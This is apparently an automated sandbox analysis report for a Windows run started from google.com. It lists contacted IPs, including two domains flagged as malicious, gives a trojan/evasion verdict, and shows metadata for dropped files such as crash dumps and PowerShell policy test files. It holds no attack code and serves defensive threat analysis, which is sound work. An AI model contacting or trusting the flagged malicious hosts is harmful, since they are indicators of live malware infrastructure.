http://www.google.com/doodles/celebrating-popcorn?hl=en	chromecache_200.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.241	csp.withgoogle.com	United States	15169	GOOGLEUS	false
216.58.212.142	unknown	United States	15169	GOOGLEUS	false
142.250.186.174	plus.l.google.com	United States	15169	GOOGLEUS	false
172.67.206.221	racedsuitreow.shop	United States	13335	CLOUDFLARENETUS	true
142.250.181.238	unknown	United States	15169	GOOGLEUS	false
142.250.185.142	unknown	United States	15169	GOOGLEUS	false
142.250.186.132	unknown	United States	15169	GOOGLEUS	false
142.250.184.206	www3.l.google.com	United States	15169	GOOGLEUS	false
185.255.122.133	finalstepgo.com	Netherlands	42237	ICMESE	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.16.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519588
Start date and time:	2024-09-26 17:54:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	http://google.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.win@31/120@23/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 20 Number of non-executed functions: 195

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.227, 172.217.16.206, 64.233.166.84, 34.104.35.123, 142.250.185.163, 172.217.16.195, 142.250.186.170, 142.250.186.42, 142.250.185.234, 142.250.186.74, 142.250.181.234, 142.250.74.202, 142.250.184.234, 216.58.206.42, 172.217.18.10, 142.250.186.138, 172.217.16.202, 216.58.206.74, 142.250.184.202, 142.250.186.106, 142.250.185.202, 172.217.16.138, 142.250.185.106, 142.250.185.170, 142.250.185.74, 142.250.185.138, 172.217.18.3, 142.250.184.195, 216.58.212.170, 13.89.179.12, 104.208.16.94, 142.250.185.238
Excluded domains from analysis (whitelisted): clients1.google.com, p-ring.msedge.net, ssl.gstatic.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ajax.googleapis.com, clientservices.googleapis.com, ogads-pa.googleapis.com, onedsblobprdcus17.centralus.cloudapp.azure.com, t-ring.msedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://google.com

Simulations

Behavior and APIs

Time	Type	Description
11:55:40	API Interceptor	44x Sleep call for process: powershell.exe modified
11:55:55	API Interceptor	2x Sleep call for process: PrivacyDrive.exe modified
11:56:01	API Interceptor	1x Sleep call for process: WerFault.exe modified

LLM Input / Output

Input	Output
URL: https://www.google.com/ Model: jbxai	{ "brand":["Google"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Sign in", "text_input_field_labels":["Google Search", "I'm Feeling Lucky"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://www.google.com/ Model: jbxai	{ "brand":["Google"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Sign in to Google", "text_input_field_labels":["Google Search", "I'm Feeling Lucky"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://www.google.com/ Model: jbxai	{ "brand":["Google"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Sign in to Google", "text_input_field_labels":["Google Search", "I'm Feeling Lucky"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://www.google.com/ Model: jbxai	{ "brand":["Google"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Sign in to Google", "text_input_field_labels":["Google Search", "I'm Feeling Lucky"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_c8e42f7fc61f7682242f1047bc22bf12abdcaff2_7d659330_dc7166e7-b95e-4e6a-bf8f-b10ee383a0db\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1124145894217368
Encrypted:	false
SSDEEP:	192:7KgGzYaw0BU/4MUj2ZrM9kFbyzuiFgZ24IO8UA:etEaLBU/ojIyzuiFgY4IO8x
MD5:	9AC035CCE93EA536504F86CA9F19B2EF
SHA1:	E497CEFEF068B04A4697FF4A26400C2BBD6B85BA
SHA-256:	10EE8B307E0D0EA79E7C26B9B249BD9B94F86FDF8EEEA81096FF3E809EB3C848
SHA-512:	56473E5DCC0F710E0A24D65593F84F1A1663F1892B7AD55C671D04D03C8BBBFD80869395C1FEE335E6675D603B565FA71D10F5D94236AB2C335E8BCB2D148604
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.7.5.8.6.9.2.6.0.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.3.9.7.5.9.3.1.2.6.0.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.7.1.6.6.e.7.-.b.9.5.e.-.4.e.6.a.-.b.f.8.f.-.b.1.0.e.e.3.8.3.a.0.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.b.9.c.8.1.7.-.2.f.2.6.-.4.b.3.f.-.a.c.d.0.-.8.5.b.d.b.6.f.e.7.0.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.9.c.-.0.0.0.1.-.0.0.1.6.-.8.8.5.a.-.c.5.8.d.2.c.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE6E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Sep 26 15:55:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	117466
Entropy (8bit):	2.114070656040872
Encrypted:	false
SSDEEP:	768:tvl+RBGhSU+zJwVNJnXTtvKqe7I00qWRwE:xlLUQXRvNiI00Q
MD5:	CEEFF92BFA9B92F9DFF103D39184872B
SHA1:	40D6796F79016CA434283E8D9A1C92ABFE8489F2
SHA-256:	88481884FF920B4C47E565DE13911CF261A22B9F7E0A0D749A863F8371FD315C
SHA-512:	2F4CB1926A719ADB78B975FDB749D37A73AAACFE1493AFD8A25EED77C11E67603BCC7D9F88DA982AEF434ADF0E4BEF4E3CB0EB08C86BE7B79BB33F4D6D07A0B9
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............................(.......T....%......T....Q..........`.......8...........T............D.............X%..........D'..............................................................................eJ.......'......GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF88.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6380
Entropy (8bit):	3.7305647420490127
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb6jE6ioOizYoXQE/foKj5aM4UY89bDngsfbhm:R6l7wVeJ6jE6cizYIPprY89bDngsfbhm
MD5:	9280292ED19FFD8D5E8A0760481B4913
SHA1:	34CDF55E7DE0155E6F80B48351F41DF93A58885D
SHA-256:	E253833D9FE17907CAE18EFEEF6FA166B91FE1D350DF123DCA6F06B412A3DD13
SHA-512:	E6566E0C544947C60FDCED302C39D447559837F002692749D6AA5EEA09580A8CB866709CC5D40B338944452CB5E4177129288F66B03722D46B14C89B5760313A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFB8.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4709
Entropy (8bit):	4.503192819994325
Encrypted:	false
SSDEEP:	48:cvIwWl8zs34Jg77aI9UHWda80aj9Ym8M4JwuTfmFTx+q82PIbm1HAcHZUd:uIjf3+I7y2dl4JwuTyz+m1HAcHZUd
MD5:	25277BCD1167B53930A7C045B8D4F076
SHA1:	76FF5BED86D6C72FBA70127C89A5B63534E38B13
SHA-256:	37305193532B1CA0B8D1B97C615AAC83B62E60FC65A7C987E9F47AAF49563EBD
SHA-512:	4D86D91A592048448CC2B1D9A042D3EA16592A80C1C853BA052F010B3E27F168EFDB0051409107C8D59AC49324F458EFB68E0416A845189106162D6530A7A5EE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517378" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21768
Entropy (8bit):	5.5380775126725625
Encrypted:	false
SSDEEP:	384:1hjrmZMuuApb1IJ1X6XNqafOBMpfp4iE5aYThcGHfhZng483Rbc6bCymZKw3:nr+Ma1c1qXNqa2CZyXNHchbcYi3
MD5:	691764928E7B6ABA7F5900B7756C9C7D
SHA1:	C93FEC2BEE2278013E175A06BC70793669579CF8
SHA-256:	03DC4233FD23AB6736FE936030A552CC898140AA846BFFD0F1B62A41A4D40F55
SHA-512:	4B98253644D4624CEDC96D0E4197F04FD50ADBCA7712CB075F2AE187D44D68EF182CE9380703E6FCB0116C78BEEDBCCF998CCBD0D7CF94803E276A32A0B8D1C4
Malicious:	false
Reputation:	low
Preview:	@...e...............&................................@..........H...............o..b~.D.poM...J..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4._.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tejna2j.xed.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxnpvv3h.4fy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mn3cnwny.uak.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzplxn2m.qcz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pddfsfas.1ok.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0ctcdyu.5yp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.986582721030304
Encrypted:	false
SSDEEP:	48:8RWdwT0g89H/idAKZdA1FehwiZUklqehey+3:8RNv83xy
MD5:	C804858D2415A71309BBB4FD2B0D8E00
SHA1:	6CCEA74A1003B355E62D548A3EEA1399BC374E99
SHA-256:	CCB6F4B9B198C66B895DBE066BB0F456DF74533C1E9F2EE7EB65AAC280FEAC6E
SHA-512:	52B87A3AD410F2DA47DE7EF060D70FB1FD8C71DC44250709532E6674864FE5E1DA10949C29B3FED64054FFB36CB2858B38B7B4650D38FFF8EFA9C5F262F4BF74
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......d~,...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I:Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V:Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V:Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V:Y.~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.002122620001932
Encrypted:	false
SSDEEP:	48:8jWdwT0g89H/idAKZdA1seh/iZUkAQkqehhy+2:8jNv8B9Qcy
MD5:	618BC46F9EB4A174A08D4A869A65FA42
SHA1:	303D67B2B6A0E91E88260928A2068D43A5968B55
SHA-256:	66C3F248B96FB05A9ED5340B5C83A0A7A718E8A8D697794FDFB2D5D7AF919436
SHA-512:	723499E0AEEADC4F474E35C97935B216BC89ABE28D518CB1EF35AE0CE9F8645974D0D5E9474D40DEA7E6E9975531572E8A2FC2164939544900BB6A979861B66D
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......Y~,...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I:Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V:Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V:Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V:Y.~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.011565521880907
Encrypted:	false
SSDEEP:	48:8HWdwT0gAH/idAKZdA14meh7sFiZUkmgqeh7sXy+BX:8HNvWnNy
MD5:	EC24815ACEA2BEF299ECAB5611259A55
SHA1:	328285845E3B79F06047EAC20FED3689ED17C812
SHA-256:	52DE04A3C343CBB9B12A6A94AC44A80579AA46535EAC5FEDD743052CF4973781
SHA-512:	E6273D232038A7E9869C7AB6D49C94481B28D8F8C4A43F50E5FCDB50C574DFD3F4411B1BB039C4575C87517A7A19F21807C6405E0358E42A281BE93E36E81B34
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I:Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V:Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V:Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.000113443352553
Encrypted:	false
SSDEEP:	48:8qWdwT0g89H/idAKZdA1TehDiZUkwqehly+R:8qNv8yPy
MD5:	4C3F2B6ABEF9BA0D64BB20569DB0F443
SHA1:	6594A529D57E34B9EF4A27714D7133D15B575FBF
SHA-256:	F514874D339A090813C2CF254162ABB07430EB330400E82F5534F7658479856A
SHA-512:	A1666988AA76AC3648232ED7ADFD9D2949983EE45E89F698A2EBEAD9A2AD53860AF475C032B1777C4F932D478947F0E27F8121DA4AE74E31F81913CE525E43CD
Malicious:	false
Reputation:	low
